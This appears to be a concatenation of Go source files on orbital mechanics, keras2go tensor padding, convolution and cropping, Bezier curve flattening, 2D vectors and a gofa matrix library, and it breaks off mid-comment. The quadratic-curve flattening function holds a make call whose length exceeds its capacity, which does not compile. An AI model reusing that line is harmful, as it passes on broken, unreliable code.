	// ArgumentOfPeriapsis defines the orientation of the ellipse in the orbital plane, as an angle measured from the ascending node to the periapsis
	ArgumentOfPeriapsis *float64 // deg
	// RightAscension horizontally orients the ascending node of the ellipse with respect to the reference frame's vernal point
	RightAscension *float64 // deg
	// TrueAnomaly defines the position of the orbiting body along the ellipse at a specific time (epoch)
	TrueAnomaly *float64 // deg
	AngularMomentum *float64
}
// String renders all orbit parameters as a multi-line human-readable
// block, one "Name: value" pair per line.
//
// Bug fix: Apogee and Perigee were previously formatted with %v on the
// raw *float64, which printed a memory address rather than the value.
// They now print the dereferenced value, or "<nil>" when unset.
func (p *OrbitParameter) String() string {
	// optional formats a possibly-nil float pointer for display.
	optional := func(f *float64) interface{} {
		if f == nil {
			return "<nil>"
		}
		return *f
	}
	s := fmt.Sprintf(" MU: %f\n", *p.MU)
	s = fmt.Sprintf("%s CentralBodyRadius: %f\n", s, *p.CentralBodyRadius)
	s = fmt.Sprintf("%s Apogee: %v\n", s, optional(p.Apogee))
	s = fmt.Sprintf("%s Perigee: %v\n", s, optional(p.Perigee))
	s = fmt.Sprintf("%s SemimajorAxis: %v\n", s, *p.SemimajorAxis)
	s = fmt.Sprintf("%s SemilatusRectum: %f\n", s, *p.SemilatusRectum)
	s = fmt.Sprintf("%s Eccentricity: %f\n", s, *p.Eccentricity)
	s = fmt.Sprintf("%s Inclination: %f\n", s, *p.Inclination)
	s = fmt.Sprintf("%s ArgumentOfPeriapsis: %f\n", s, *p.ArgumentOfPeriapsis)
	s = fmt.Sprintf("%s RightAscension: %f\n", s, *p.RightAscension)
	s = fmt.Sprintf("%s TrueAnomaly: %f\n", s, *p.TrueAnomaly)
	s = fmt.Sprintf("%s AngularMomentum: %v\n", s, *p.AngularMomentum)
	return s
}
// extendParams derives the missing orbital quantities in place: it first
// applies defaults (baseParams), then computes the semimajor axis and
// eccentricity from apogee/perigee when both are given (or the semimajor
// axis from the semilatus rectum), fills in the semilatus rectum if
// absent, and finally derives the angular momentum.
//
// NOTE(review): assumes MU and CentralBodyRadius are non-nil, and that
// SemimajorAxis is already set when neither apogee/perigee nor semilatus
// rectum are provided — otherwise this nil-derefs; confirm callers.
// The semimajorAxisFrom* / eccentricityFrom* / angularMomentumFrom*
// helpers are defined elsewhere in this package.
func extendParams(params *OrbitParameter) *OrbitParameter {
	params = baseParams(params)
	if params.Apogee != nil && params.Perigee != nil {
		semimajorAxis := semimajorAxisFromApogeeAndPerigee(*params.Apogee, *params.Perigee, *params.CentralBodyRadius)
		eccentricity := eccentricityFromSemimajorAxisAndPerigee(semimajorAxis, *params.Perigee, *params.CentralBodyRadius)
		params.SemimajorAxis = &semimajorAxis
		params.Eccentricity = &eccentricity
	} else if params.SemilatusRectum != nil {
		semimajorAxis := semimajorAxisFromSemilatusRectumAndEccentricity(*params.SemilatusRectum, *params.Eccentricity)
		params.SemimajorAxis = &semimajorAxis
	}
	if params.SemilatusRectum == nil {
		semilatusRectum := semilatusRectumFromSemimajorAxisAndEccentricity(*params.SemimajorAxis, *params.Eccentricity)
		params.SemilatusRectum = &semilatusRectum
	}
	angularMomentum := angularMomentumFromSemilatusRectum(*params.SemilatusRectum, *params.MU)
	params.AngularMomentum = &angularMomentum
	return params
}
func baseParams(params *OrbitParameter) *OrbitParameter {
zero := 0.0
if params.Inclination == nil {
params.Inclination = &zero
}
if params.ArgumentOfPeriapsis == nil {
params.ArgumentOfPeriapsis = &zero
}
if params.RightAscension == nil {
params.RightAscension = &zero
}
if params.TrueAnomaly == nil {
params.TrueAnomaly = &zero
}
if params.Eccentricity == nil {
params.Eccentricity = &zero
}
return params
} | server/mathf/orbit/orbit-parameter.go | 0.747984 | 0.627552 | orbit-parameter.go | starcoder |
package keras2go
import "math"
/**
 * 1D (temporal) Padding.
 *
 * :param output: tensor to store padded output data.
 * :param input: tensor to pad.
 * :param fill: value to fill in padded areas.
 * :param pad: Array[2] of how many rows to pad. Order is {before dim 1, after dim 1}.
 */
func k2c_pad1d(output *K2c_tensor, input *K2c_tensor, fill float64, pad []int) {
	// Fill the entire output with the pad value, then overlay the input
	// data after pad[0] leading rows of width Shape[1].
	rowWidth := input.Shape[1]
	output.fillFloat64(fill)
	start := pad[0] * rowWidth
	copy(output.Array[start:], input.Array[:input.Numel])
}
// fillFloat64 sets the first Numel entries of the tensor's backing
// array to fill.
//
// FIX: the previous code treated any |fill| < 1e-6 as zero, so a small
// non-zero fill value (e.g. 1e-7) was silently replaced by 0. Only an
// exact zero takes the zeroing fast path now.
func (this *K2c_tensor) fillFloat64(fill float64) {
	if math.Abs(fill) == 0 {
		for idx := 0; idx < this.Numel; idx++ {
			this.Array[idx] = 0
		}
	} else {
		for idx := 0; idx < this.Numel; idx++ {
			this.Array[idx] = fill
		}
	}
}
/**
 * 2D (spatial) Padding.
 *
 * :param output: tensor to store padded output data.
 * :param input: tensor to pad.
 * :param fill: value to fill in padded areas.
 * :param pad: Array[4] of how many rows/cols to pad. Order is {before dim 1, after dim 1, before dim 2, after dim 2}.
 */
func k2c_pad2d(output *K2c_tensor, input *K2c_tensor, fill float64, pad []int) {
	in_height := input.Shape[0]
	in_width := input.Shape[1]
	in_channels := input.Shape[2]
	pad_top := pad[0]
	pad_left := pad[2]
	pad_right := pad[3]
	// Pre-fill everything with the pad value; the row copies below then
	// overwrite the interior region.
	output.fillFloat64(fill)
	// Flat index of the first interior element: skip pad_top full output
	// rows plus the left padding of the first interior row.
	offset := in_channels*(pad_left+pad_right+in_width)*pad_top + in_channels*pad_left
	// Payload values per input row.
	num := in_channels * in_width
	// Distance between starts of consecutive interior rows in the
	// (wider) output.
	step := num + in_channels*(pad_left+pad_right)
	for idx := 0; idx < in_height; idx++ {
		copy(output.Array[offset:], input.Array[idx*num:idx*num+num])
		offset += step
	}
}
/**
 * 3D (spatial or spatio-temporal) Padding.
 *
 * :param output: tensor to store padded output data.
 * :param input: tensor to pad.
 * :param fill: value to fill in padded areas.
 * :param pad: Array[6] of how many rows/cols to pad. Order is {before dim 1, after dim 1, before dim 2, after dim 2, before dim 3, after dim 3}.
 */
func k2c_pad3d(output *K2c_tensor, input *K2c_tensor, fill float64, pad []int) {
	dim1 := input.Shape[0]
	dim2 := input.Shape[1]
	dim3 := input.Shape[2]
	//outdim1 := dim1 + pad[0] + pad[1]
	outdim2 := dim2 + pad[2] + pad[3]
	outdim3 := dim3 + pad[4] + pad[5]
	in_channels := input.Shape[3]
	// Pre-fill with the pad value, then copy each contiguous dim-3 run
	// of the input into its padded position.
	output.fillFloat64(fill)
	// Flat offset of the first interior element in the output.
	offset1 := in_channels*(outdim2*outdim3)*pad[0] + in_channels*outdim3*pad[2] + in_channels*pad[4]
	// Payload values per (dim1, dim2) slot.
	num := in_channels * dim3
	// Output stride along dim 2 (payload plus dim-3 padding).
	outstep2 := num + in_channels*(pad[4]+pad[5])
	outstep1 := outdim2 * outdim3 * in_channels
	instep1 := dim2 * dim3 * in_channels
	instep2 := dim3 * in_channels
	for i := 0; i < dim1; i++ {
		for j := 0; j < dim2; j++ {
			inIdx := i*instep1 + j*instep2
			copy(output.Array[offset1+i*outstep1+j*outstep2:], input.Array[inIdx:inIdx+num])
		}
	}
}
/**
 * 1D (temporal) Convolution.
 * Assumes a "channels last" structure.
 *
 * :param output: output tensor.
 * :param input: input tensor.
 * :param kernel: kernel tensor.
 * :param bias: bias tensor.
 * :param stride: stride length of the convolution.
 * :param dilation: dilation rate to use for dilated convolution.
 * :param activation: activation function to apply to output.
 */
func k2c_conv1d(output *K2c_tensor, input *K2c_tensor, kernel *K2c_tensor, bias *K2c_tensor, stride int, dilation int, activation k2c_activationType) {
	output.fillFloat64(0)
	out_times := output.Shape[0]
	out_channels := output.Shape[1]
	in_channels := input.Shape[1]
	// Kernel is laid out as (tap z, input channel q, output channel k);
	// input as (time, channel) — both channels-last, flattened row-major.
	for x0 := 0; x0 < out_times; x0++ {
		for z := 0; z < kernel.Shape[0]; z++ {
			for q := 0; q < in_channels; q++ {
				for k := 0; k < out_channels; k++ {
					output.Array[x0*out_channels+k] += kernel.Array[z*(kernel.Shape[2]*kernel.Shape[1])+q*(kernel.Shape[2])+k] * input.Array[(x0*stride+dilation*z)*in_channels+q]
				}
			}
		}
	}
	// Add the per-channel bias, then apply the activation in place.
	k2c_bias_add(output, bias)
	activation(output.Array[:output.Numel])
}
/**
 * 2D (spatial) Convolution.
 * Assumes a "channels last" structure.
 *
 * :param output: output tensor.
 * :param input: input tensor.
 * :param kernel: kernel tensor.
 * :param bias: bias tensor.
 * :param stride: Array[2] of stride length of the convolution. Order is {stride dim 1, stride dim 2}.
 * :param dilation: Array[2] dilation rate to use for dilated convolution. Order is {dilation dim 1, dilation dim 2}.
 * :param activation: activation function to apply to output.
 */
func k2c_conv2d(output *K2c_tensor, input *K2c_tensor, kernel *K2c_tensor, bias *K2c_tensor, stride []int, dilation []int, activation k2c_activationType) {
	output.fillFloat64(0)
	out_rows := output.Shape[0]
	out_cols := output.Shape[1]
	out_channels := output.Shape[2]
	in_channels := input.Shape[2]
	// Kernel layout: (z0, z1, input channel q, output channel k);
	// input layout: (row, col, channel) — channels-last, row-major.
	for x0 := 0; x0 < out_rows; x0++ {
		for x1 := 0; x1 < out_cols; x1++ {
			for z0 := 0; z0 < kernel.Shape[0]; z0++ {
				for z1 := 0; z1 < kernel.Shape[1]; z1++ {
					for q := 0; q < in_channels; q++ {
						for k := 0; k < out_channels; k++ {
							// FIX 1: kernel index was q*(kernel.Shape[3]+k),
							// i.e. k was added to the stride instead of the
							// index; must be q*(kernel.Shape[3])+k (matches
							// k2c_conv1d / k2c_conv3d).
							// FIX 2: input row index was x0+stride[0]+...;
							// must be x0*stride[0]+... (matches the column
							// term and k2c_conv3d).
							output.Array[x0*(output.Shape[2]*output.Shape[1])+
								x1*(output.Shape[2])+k] +=
								kernel.Array[z0*(kernel.Shape[3]*kernel.Shape[2]*kernel.Shape[1])+
									z1*(kernel.Shape[3]*kernel.Shape[2])+
									q*(kernel.Shape[3])+k] *
									input.Array[(x0*stride[0]+dilation[0]*z0)*
										(input.Shape[2]*input.Shape[1])+
										(x1*stride[1]+dilation[1]*z1)*(input.Shape[2])+q]
						}
					}
				}
			}
		}
	}
	// Add the per-channel bias, then apply the activation in place.
	k2c_bias_add(output, bias)
	activation(output.Array[:output.Numel])
}
/**
 * 3D (spatial or spatio-temporal) Convolution.
 * Assumes a "channels last" structure.
 *
 * :param output: output tensor.
 * :param input: input tensor.
 * :param kernel: kernel tensor.
 * :param bias: bias tensor.
 * :param stride: Array[3] of stride length of the convolution. Order is {stride dim 1, stride dim 2, stride dim 3}.
 * :param dilation: Array[3] dilation rate to use for dilated convolution. Order is {dilation dim 1, dilation dim 2, dilation dim 3}.
 * :param activation: activation function to apply to output.
 */
func k2c_conv3d(output *K2c_tensor, input *K2c_tensor, kernel *K2c_tensor, bias *K2c_tensor, stride []int, dilation []int, activation k2c_activationType) {
	output.fillFloat64(0)
	dim1 := output.Shape[0]
	dim2 := output.Shape[1]
	dim3 := output.Shape[2]
	out_channels := output.Shape[3]
	in_channels := input.Shape[3]
	// Kernel layout: (z0, z1, z2, input channel q, output channel k);
	// input layout: (d1, d2, d3, channel) — channels-last, row-major.
	for x0 := 0; x0 < dim1; x0++ {
		for x1 := 0; x1 < dim2; x1++ {
			for x2 := 0; x2 < dim3; x2++ {
				for z0 := 0; z0 < kernel.Shape[0]; z0++ {
					for z1 := 0; z1 < kernel.Shape[1]; z1++ {
						for z2 := 0; z2 < kernel.Shape[2]; z2++ {
							for q := 0; q < in_channels; q++ {
								for k := 0; k < out_channels; k++ {
									output.Array[x0*(output.Shape[3]*output.Shape[2]*
										output.Shape[1])+
										x1*(output.Shape[3]*output.Shape[2])+
										x2*(output.Shape[3])+k] +=
										kernel.Array[z0*(kernel.Shape[4]*kernel.Shape[3]*kernel.Shape[2]*kernel.Shape[1])+
											z1*(kernel.Shape[4]*kernel.Shape[3]*kernel.Shape[2])+
											z2*(kernel.Shape[4]*kernel.Shape[3])+
											q*(kernel.Shape[4])+k] *
											input.Array[(x0*stride[0]+dilation[0]*z0)*
												(input.Shape[3]*input.Shape[2]*input.Shape[1])+
												(x1*stride[1]+dilation[1]*z1)*(input.Shape[3]*input.Shape[2])+
												(x2*stride[2]+dilation[2]*z2)*(input.Shape[3])+q]
								}
							}
						}
					}
				}
			}
		}
	}
	// Add the per-channel bias, then apply the activation in place.
	k2c_bias_add(output, bias)
	activation(output.Array[:output.Numel])
}
/**
 * 1D (temporal) Cropping.
 *
 * :param output: tensor to store cropped output data.
 * :param input: tensor to crop.
 * :param crop: Array[2] of how many rows to crop. Order is {before dim 1, after dim 1}.
 */
func k2c_crop1d(output *K2c_tensor, input *K2c_tensor, crop []int) {
	// Skip crop[0] leading rows, then take exactly output.Numel values;
	// the trailing crop is implied by the output size.
	start := crop[0] * input.Shape[1]
	copy(output.Array, input.Array[start:start+output.Numel])
}
/**
 * 2D (spatial) Cropping.
 *
 * :param output: tensor to store cropped output data.
 * :param input: tensor to crop.
 * :param crop: Array[4] of how many rows/cols to crop. Order is {before dim 1, after dim 1, before dim 2, after dim 2}.
 */
func k2c_crop2d(output *K2c_tensor, input *K2c_tensor, crop []int) {
	var out_height = output.Shape[0]
	var in_width = input.Shape[1]
	var in_channels = input.Shape[2]
	var crop_top = crop[0]
	var crop_left = crop[2]
	var crop_right = crop[3]
	// Flat index of the first kept element: skip crop_top full input
	// rows plus crop_left columns of the first kept row.
	var offset = in_channels*in_width*crop_top + in_channels*crop_left
	// Number of values kept per row.
	var num = in_channels * (in_width - crop_left - crop_right)
	for i := 0; i < out_height; i++ {
		copy(output.Array[i*num:], input.Array[offset:offset+num])
		// Advance by a full (uncropped) input row.
		offset += in_width * in_channels
	}
}
/**
 * 3D (spatial or spatio-temporal) Cropping.
 *
 * :param output: tensor to store cropped output data.
 * :param input: tensor to crop.
 * :param crop: Array[6] of how many rows/cols to crop. Order is {before dim 1, after dim 1, before dim 2, after dim 2, before dim 3, after dim 3}.
 */
func k2c_crop3d(output *K2c_tensor, input *K2c_tensor, crop []int) {
	var dim1 = input.Shape[0]
	var dim2 = input.Shape[1]
	var dim3 = input.Shape[2]
	var outdim1 = dim1 - crop[0] - crop[1]
	var outdim2 = dim2 - crop[2] - crop[3]
	var outdim3 = dim3 - crop[4] - crop[5]
	var in_channels = input.Shape[3]
	// Flat index of the first kept element in the input.
	var offset1 = in_channels*(dim2*dim3)*crop[0] + in_channels*dim3*crop[2] + in_channels*crop[4]
	// Number of values kept per (dim1, dim2) slot.
	var num = in_channels * outdim3
	// Input stride along dim 2 (kept payload plus cropped dim-3 ends).
	var instep2 = num + in_channels*(crop[4]+crop[5])
	var instep1 = dim2 * dim3 * in_channels
	var outstep1 = outdim2 * outdim3 * in_channels
	var outstep2 = outdim3 * in_channels
	for i := 0; i < outdim1; i++ {
		for j := 0; j < outdim2; j++ {
			inIdx := offset1 + i*instep1 + j*instep2
			copy(output.Array[i*outstep1+j*outstep2:], input.Array[inIdx:inIdx+num])
		}
	}
}
/**
 * 1D (temporal) Upsampling.
 * Repeats each temporal step size times along the time axis.
 *
 * :param output: output tensor.
 * :param input: input tensor.
 * :param size: Upsampling factor.
 */
func k2c_upsampling1d(output *K2c_tensor, input *K2c_tensor, size int) {
	width := input.Shape[1]
	for i := 0; i < input.Shape[0]; i++ {
		// Write size consecutive copies of input row i into the output.
		row := input.Array[i*width : (i+1)*width]
		for j := 0; j < size; j++ {
			copy(output.Array[(size*i+j)*width:], row)
		}
	}
}
/**
 * 2D (spatial) Upsampling.
 * Repeats the rows and columns of the data by size[0] and size[1] respectively.
 *
 * :param output: output tensor.
 * :param input: input tensor.
 * :param size: Array[2] of upsampling factors. Order is {upsampling dim 1, upsampling dim 2}.
 */
func k2c_upsampling2d(output *K2c_tensor, input *K2c_tensor, size []int) {
	var out_height = output.Shape[0]
	var out_width = output.Shape[1]
	var channels = output.Shape[2]
	for i := 0; i < out_height; i++ {
		for j := 0; j < out_width; j++ {
			// Each output pixel (i, j) copies the full channel vector of
			// the input pixel (i/size[0], j/size[1]).
			var insub = [K2C_MAX_NDIM]int{i / size[0], j / size[1], 0}
			var outsub = [K2C_MAX_NDIM]int{i, j, 0}
			inIdx := k2c_sub2idx(insub[:], input.Shape[:], input.Ndim)
			copy(output.Array[k2c_sub2idx(outsub[:], output.Shape[:], output.Ndim):], input.Array[inIdx:inIdx+channels])
		}
	}
}
/**
 * 3D (spatial or spatio-temporal) Upsampling.
 * Repeats the 1st, 2nd and 3rd dimensions of the data by size[0], size[1] and size[2] respectively.
 *
 * :param output: output tensor.
 * :param input: input tensor.
 * :param size: Array[3] of upsampling factors. Order is {upsampling dim 1, upsampling dim 2, upsampling dim 3}.
 */
func k2c_upsampling3d(output *K2c_tensor, input *K2c_tensor, size []int) {
	var dim1 = output.Shape[0]
	var dim2 = output.Shape[1]
	var dim3 = output.Shape[2]
	var channels = input.Shape[3]
	for i := 0; i < dim1; i++ {
		for j := 0; j < dim2; j++ {
			for k := 0; k < dim3; k++ {
				// Each output cell copies the full channel vector of the
				// input cell at the integer-divided coordinates.
				var insub = [K2C_MAX_NDIM]int{i / size[0], j / size[1], k / size[2], 0}
				var outsub = [K2C_MAX_NDIM]int{i, j, k, 0}
				inIdx := k2c_sub2idx(insub[:], input.Shape[:], input.Ndim)
				copy(output.Array[k2c_sub2idx(outsub[:], output.Shape[:], output.Ndim):], input.Array[inIdx:inIdx+channels])
			}
		}
	}
}
package geometry
import (
"math"
)
const (
	// curveRecursionLimit bounds the depth of the subdivision stack used
	// when flattening curves into polylines.
	curveRecursionLimit = 32
)

// CubicCurve is a cubic Bezier curve defined by 2 control points;
// the first and last points are respectively the start and the end of
// the curve.
type CubicCurve [4]Vector
// Subdivide splits the curve at t = 0.5 (de Casteljau midpoint scheme)
// into two cubic curves whose union is equivalent to the original.
func (c CubicCurve) Subdivide() (c1, c2 CubicCurve) {
	// First-level midpoints of the control polygon.
	ab := c[0].Center(c[1])
	bc := c[1].Center(c[2])
	cd := c[2].Center(c[3])
	// Second-level midpoints.
	abc := ab.Center(bc)
	bcd := bc.Center(cd)
	// Point on the curve at t = 0.5, shared by both halves.
	mid := abc.Center(bcd)
	c1 = CubicCurve{c[0], ab, abc, mid}
	c2 = CubicCurve{mid, bcd, cd, c[3]}
	return
}
// ToPolyline flattens the curve into a polyline.
// flatteningThreshold controls when subdivision stops (0.25 gives good
// results); see http://www.antigrain.com/research/adaptive_bezier/index.html
func (curve CubicCurve) ToPolyline(flatteningThreshold float64) Polyline {
	var curves [curveRecursionLimit]CubicCurve
	curves[0] = curve
	i := 0
	// current curve
	var c CubicCurve
	// FIX: was make(Polyline, 32, 0) — a length larger than the
	// capacity, which is rejected by the compiler. What is wanted is an
	// empty polyline with room for curveRecursionLimit points.
	p := make(Polyline, 0, curveRecursionLimit)
	for i >= 0 {
		c = curves[i]
		d := c[3].Sub(c[0])
		dn := d.Normal()
		// Sum of the control points' distances from the chord, measured
		// along the chord normal (flatness estimate).
		d2 := math.Abs(c[1].Sub(c[3]).Dot(dn)) + math.Abs(c[2].Sub(c[3]).Dot(dn))
		if d2*d2 < flatteningThreshold*d.LengthSquare() || i == len(curves)-1 {
			// Flat enough (or the stack is full): emit the end point.
			p = append(p, c[3])
			i--
		} else {
			// Subdivide; the second half of the bezier goes lower onto
			// the stack.
			curves[i+1], curves[i] = c.Subdivide()
			i++
		}
	}
	return p
}
// QuadCurve is a quadratic Bezier curve defined by 1 control point;
// the first and last points are respectively the start and the end of
// the curve.
type QuadCurve [3]Vector
// Subdivide splits the quadratic curve at t = 0.5 into two quadratic
// curves whose union is equivalent to the original.
func (c QuadCurve) Subdivide() (c1, c2 QuadCurve) {
	// Midpoints of the control polygon legs.
	ab := c[0].Center(c[1])
	bc := c[1].Center(c[2])
	// Point on the curve at t = 0.5, shared by both halves.
	mid := ab.Center(bc)
	c1 = QuadCurve{c[0], ab, mid}
	c2 = QuadCurve{mid, bc, c[2]}
	return
}
// Flatten Curve into a Polyline
// The parameter is used (curvy tolerance) to know when to stop the flatenning process
func (curve QuadCurve) ToPolyline(flattening_threshold float64) Polyline {
var curves [curveRecursionLimit]QuadCurve
curves[0] = curve
i := 0
// current curve
var c QuadCurve
var dx, dy, d float64
p := make(Polyline, curveRecursionLimit, 0)
for i >= 0 {
c = curves[i]
dx = c[2].X - c[0].X
dy = c[2].Y - c[0].Y
d = math.Abs((c[1].X-c[2].X)*dy - (c[1].Y-c[2].Y)*dx)
if (d*d) < flattening_threshold*(dx*dx+dy*dy) || i == len(curves)-1 {
p = append(p, c[2])
i--
} else {
// second half of bezier go lower onto the stack
curves[i+1], curves[i] = c.Subdivide()
i++
}
}
return p
} | geometry/curve.go | 0.758153 | 0.526099 | curve.go | starcoder |
package vecmath
import (
"fmt"
"math"
"github.com/etic4/vecmath/maths"
)
//Vec2 is a 2D vector.
type Vec2 struct {
	X float64
	Y float64
}

//NewVector builds a vector from its two components.
func NewVector(x, y float64) Vec2 {
	return Vec2{X: x, Y: y}
}

//FromPolar builds a vector from polar coordinates.
// param angle: angle in radians
// param length: magnitude
// The Y component is negated because y = 0 is at the top-left (screen
// coordinates).
func FromPolar(angle float64, length float64) Vec2 {
	return NewVector(length*math.Cos(angle), -length*math.Sin(angle))
}

//Clone returns a copy of the vector.
//Vectors are passed by value, so the receiver is already a copy.
func (v Vec2) Clone() Vec2 {
	return v
}

//Equals reports whether both components are identical.
func (v Vec2) Equals(other Vec2) bool {
	return v.X == other.X && v.Y == other.Y
}

//Angle returns the angle in radians between this vector and the x axis.
func (v Vec2) Angle() float64 {
	a := math.Atan2(v.Y, v.X)
	if a < 0 {
		a += 2 * math.Pi
	}
	// Negated because of the downward-pointing y axis.
	return -a
}

//Add returns the sum of the two vectors.
func (v Vec2) Add(v2 Vec2) Vec2 {
	return NewVector(v.X+v2.X, v.Y+v2.Y)
}

//AddScalar adds s to each component.
func (v Vec2) AddScalar(s float64) Vec2 {
	return NewVector(v.X+s, v.Y+s)
}

//Sub returns the difference of the two vectors.
func (v Vec2) Sub(v2 Vec2) Vec2 {
	return NewVector(v.X-v2.X, v.Y-v2.Y)
}

//SubScalar subtracts s from each component.
func (v Vec2) SubScalar(s float64) Vec2 {
	return NewVector(v.X-s, v.Y-s)
}

//DotProduct returns the scalar (dot) product of the two vectors.
func (v Vec2) DotProduct(v2 Vec2) float64 {
	return v.X*v2.X + v.Y*v2.Y
}

//Mult multiplies the vector by a scalar.
func (v Vec2) Mult(s float64) Vec2 {
	return NewVector(v.X*s, v.Y*s)
}

//Div divides the vector by a scalar.
//No guard against s == 0: components become Inf/NaN in that case.
func (v Vec2) Div(s float64) Vec2 {
	return NewVector(v.X/s, v.Y/s)
}

//Neg returns the opposite vector (rotated 180 degrees).
func (v Vec2) Neg() Vec2 {
	return v.Mult(-1)
}

//Length returns the norm (magnitude) of the vector.
func (v Vec2) Length() float64 {
	return math.Sqrt(v.DotProduct(v))
}

//Normalize returns the unit vector with the same direction.
//The zero vector is returned unchanged.
func (v Vec2) Normalize() Vec2 {
	if l := v.Length(); l != 0 {
		return v.Div(l)
	}
	return v
}

//Distance returns the distance between the two vectors.
func (v Vec2) Distance(v2 Vec2) float64 {
	return v2.Sub(v).Length()
}

//DistanceSq returns the squared distance (convenience, avoids a sqrt).
func (v Vec2) DistanceSq(v2 Vec2) float64 {
	dx := v2.X - v.X
	dy := v2.Y - v.Y
	return dx*dx + dy*dy
}

//SetMag returns a vector with the same direction and the given length.
func (v Vec2) SetMag(length float64) Vec2 {
	return v.Normalize().Mult(length)
}

//Lerp linearly interpolates between this vector and other at parameter t.
func (v Vec2) Lerp(other Vec2, t float64) Vec2 {
	return NewVector(v.X+t*(other.X-v.X), v.Y+t*(other.Y-v.Y))
}

//ZERO is the (0, 0) vector.
func ZERO() Vec2 {
	return NewVector(0, 0)
}

//UP is the (0, -1) vector.
func UP() Vec2 {
	return NewVector(0, -1)
}

//DOWN is the (0, 1) vector.
func DOWN() Vec2 {
	return NewVector(0, 1)
}

//LEFT is the (-1, 0) vector.
func LEFT() Vec2 {
	return NewVector(-1, 0)
}

//RIGHT is the (1, 0) vector.
func RIGHT() Vec2 {
	return NewVector(1, 0)
}

//Round rounds both components to the given number of decimals.
func (v Vec2) Round(decimals int) Vec2 {
	f := math.Pow10(decimals)
	return NewVector(math.Round(v.X*f)/f, math.Round(v.Y*f)/f)
}
//LimitMag clamps the vector's length to the [min, max] interval,
//keeping its direction.
func (v Vec2) LimitMag(min float64, max float64) Vec2 {
	return v.SetMag(maths.Clamp(v.Length(), min, max))
}
//String implements fmt.Stringer, formatting the vector as "x,y".
func (v Vec2) String() string {
	return fmt.Sprintf("%v,%v", v.X, v.Y)
}
package gofa
// Vector/Matrix Library
// 1. Initialization (4)
// Operations involving p-vectors and r-matrices (3)
/*
Zp Zero a p-vector.

Returned:

	p  [3]float64  zero p-vector
*/
func Zp(p *[3]float64) {
	for i := range p {
		p[i] = 0.0
	}
}

/*
Zr Initialize an r-matrix to the null matrix.

Returned:

	r  [3][3]float64  r-matrix
*/
func Zr(r *[3][3]float64) {
	for i := range r {
		for j := range r[i] {
			r[i][j] = 0.0
		}
	}
}

/*
Ir Initialize an r-matrix to the identity matrix.

Returned:

	r  [3][3]float64  r-matrix
*/
func Ir(r *[3][3]float64) {
	Zr(r)
	r[0][0] = 1.0
	r[1][1] = 1.0
	r[2][2] = 1.0
}

/*
Zpv Zero a pv-vector (both position and velocity parts).

Returned:

	pv  [2][3]float64  zero pv-vector

Called:

	Zp  zero p-vector
*/
func Zpv(pv *[2][3]float64) {
	Zp(&pv[0])
	Zp(&pv[1])
}
// 2. Copy/Extend/Extract (5)
// Operations involving p-vectors and r-matrices (2)
/*
Cp Copy a p-vector.

Given:

	p  [3]float64  p-vector to be copied

Returned:

	c  [3]float64  copy
*/
func Cp(p [3]float64, c *[3]float64) {
	// Go array assignment copies all elements.
	*c = p
}

/*
Cr Copy an r-matrix.

Given:

	r  [3][3]float64  r-matrix to be copied

Returned:

	c  [3][3]float64  copy

Called:

	Cp  copy p-vector
*/
func Cr(r [3][3]float64, c *[3][3]float64) {
	for i := range r {
		Cp(r[i], &c[i])
	}
}
// Operations involving pv-vectors (3)
/*
Cpv Copy a position/velocity vector.

Given:

	pv  [2][3]float64  position/velocity vector to be copied

Returned:

	c  [2][3]float64  copy
*/
func Cpv(pv [2][3]float64, c *[2][3]float64) {
	// Go array assignment copies both component vectors.
	*c = pv
}

/*
P2pv Extend a p-vector to a pv-vector by appending a zero velocity.

Given:

	p  [3]float64  p-vector

Returned:

	pv  [2][3]float64  pv-vector
*/
func P2pv(p [3]float64, pv *[2][3]float64) {
	pv[0] = p
	pv[1] = [3]float64{}
}

/*
Pv2p Discard velocity component of a pv-vector.

Given:

	pv  [2][3]float64  pv-vector

Returned:

	p  [3]float64  p-vector
*/
func Pv2p(pv [2][3]float64, p *[3]float64) {
	*p = pv[0]
}
// 3. Build Rotations (3)
/*
Rx Rotate an r-matrix about the x-axis.

Given:

	phi  float64  angle (radians)

Given and returned:

	r  [3][3]float64  r-matrix, rotated

Notes:

 1. Calling this function with positive phi incorporates in the
    supplied r-matrix r an additional rotation, about the x-axis,
    anticlockwise as seen looking towards the origin from positive x.

 2. The additional rotation can be represented by this matrix:

    (  1        0            0      )
    (  0   + cos(phi)   + sin(phi)  )
    (  0   - sin(phi)   + cos(phi)  )
*/
func Rx(phi float64, r *[3][3]float64) {
	s, c := sin(phi), cos(phi)
	// Only rows 1 and 2 change; compute each column's new pair before
	// writing so the update is order-independent.
	for j := 0; j < 3; j++ {
		r1 := c*r[1][j] + s*r[2][j]
		r2 := c*r[2][j] - s*r[1][j]
		r[1][j], r[2][j] = r1, r2
	}
}

/*
Ry Rotate an r-matrix about the y-axis.

Given:

	theta  float64  angle (radians)

Given and returned:

	r  [3][3]float64  r-matrix, rotated

Notes:

 1. Calling this function with positive theta incorporates in the
    supplied r-matrix r an additional rotation, about the y-axis,
    anticlockwise as seen looking towards the origin from positive y.

 2. The additional rotation can be represented by this matrix:

    (  + cos(theta)   0   - sin(theta)  )
    (       0         1        0        )
    (  + sin(theta)   0   + cos(theta)  )
*/
func Ry(theta float64, r *[3][3]float64) {
	s, c := sin(theta), cos(theta)
	// Only rows 0 and 2 change.
	for j := 0; j < 3; j++ {
		r0 := c*r[0][j] - s*r[2][j]
		r2 := s*r[0][j] + c*r[2][j]
		r[0][j], r[2][j] = r0, r2
	}
}

/*
Rz Rotate an r-matrix about the z-axis.

Given:

	psi  float64  angle (radians)

Given and returned:

	r  [3][3]float64  r-matrix, rotated

Notes:

 1. Calling this function with positive psi incorporates in the
    supplied r-matrix r an additional rotation, about the z-axis,
    anticlockwise as seen looking towards the origin from positive z.

 2. The additional rotation can be represented by this matrix:

    (  + cos(psi)   + sin(psi)   0  )
    (  - sin(psi)   + cos(psi)   0  )
    (       0            0       1  )
*/
func Rz(psi float64, r *[3][3]float64) {
	s, c := sin(psi), cos(psi)
	// Only rows 0 and 1 change.
	for j := 0; j < 3; j++ {
		r0 := c*r[0][j] + s*r[1][j]
		r1 := c*r[1][j] - s*r[0][j]
		r[0][j], r[1][j] = r0, r1
	}
}
// 4. Spherical/Cartesian Conversions (6)
// Operations involving p-vectors and r-matrices (4)
/*
S2c Convert spherical coordinates to Cartesian.

Given:

	theta  float64  longitude angle (radians)
	phi    float64  latitude angle (radians)

Returned:

	c  [3]float64  direction cosines (unit vector)
*/
func S2c(theta, phi float64, c *[3]float64) {
	cp := cos(phi)
	c[0] = cp * cos(theta)
	c[1] = cp * sin(theta)
	c[2] = sin(phi)
}

/*
C2s P-vector to spherical coordinates.

Given:

